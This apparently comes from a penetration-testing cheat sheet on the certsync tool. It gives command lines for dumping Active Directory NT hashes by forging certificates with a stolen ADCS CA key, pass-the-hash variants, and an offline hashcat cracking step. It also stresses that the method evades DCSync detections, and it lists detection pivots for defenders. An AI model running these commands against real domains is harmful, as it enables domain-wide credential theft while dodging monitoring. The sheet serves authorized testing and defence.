← All cheat sheets

CERTSYNC

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

certsync dumps NTDS.dit (domain hashes) WITHOUT DRSUAPI/DCSync by
abusing ADCS: it reads users + the CA cert/key over LDAP, forges
certificates via PKINIT/UnPAC-the-hash, and recovers NT hashes. Useful
when DCSync is monitored/blocked but ADCS is reachable. Authorized only.

CONCEPT#

# 1. Enumerate domain users via LDAP
# 2. Retrieve the CA certificate + private key (needs the rights)
# 3. Forge a certificate per user -> PKINIT -> UnPAC-the-hash -> NT hash
# No DRSUAPI replication traffic = evades classic DCSync detections

BASIC USAGE#

certsync -u user -p 'Pass' -d corp.lu -dc-ip <dc> -dns-tcp
certsync -u user -H :<nthash> -d corp.lu -dc-ip <dc> -ns <dns-ip>
certsync -u user -p 'Pass' -d corp.lu -dc-ip <dc> -ns <dc-ip>
# -ns / DNS is needed to resolve the CA host for PKINIT

OUTPUT#

certsync ... -o ntds_dump                       # Output file prefix
certsync ... -outputfile hashes                  # Hashes output
# Produces secretsdump-style user:rid:lm:nt::: lines

KERBEROS / AUTH OPTIONS#

certsync ... -k                                   # Use Kerberos auth
certsync ... -dc-ip <dc> -ns <dns>                # Explicit DC + resolver
certsync ... -dns-tcp                              # DNS over TCP

TUNING / SCOPE#

certsync ... -user-file users.txt                # Limit to specific users
# Large domains: forging a cert per user takes time; scope where possible

EXAMPLES#

# Dump domain NT hashes via ADCS instead of DCSync
certsync -u user -p 'Pass' -d corp.lu -dc-ip 10.0.0.1 -ns 10.0.0.1 \
  -o ntds_dump

# Pass-the-hash variant with explicit DNS resolver
certsync -u user -H :<nthash> -d corp.lu -dc-ip 10.0.0.1 -ns 10.0.0.1

# Crack the recovered NT hashes offline
# hashcat -m 1000 ntds_dump.ntds rockyou.txt

NOTES#

- Requires the ability to read the CA certificate + private key (e.g.
  via a compromised CA admin or ESC-style access) - it is not a
  no-privilege attack
- Its selling point is EVASION: no DRSUAPI/DCSync replication, so
  detections keyed on 4662 replication rights / DRSUAPI miss it
- Pairs with ADCS-ATTACKS.txt (how you get CA access) and CERTIPY
  (which you already have) for the certificate primitives
- Detection pivots to: CA private key access, mass PKINIT/AS-REQ with
  certs, anomalous certificate issuance (see DEFENDER-KQL / SENTINEL)
- Recovered hashes are highly sensitive - handle per FS engagement
  data-handling rules (encrypt at rest, destroy at close)
- Confirm exact flags with 'certsync -h' - options shift across versions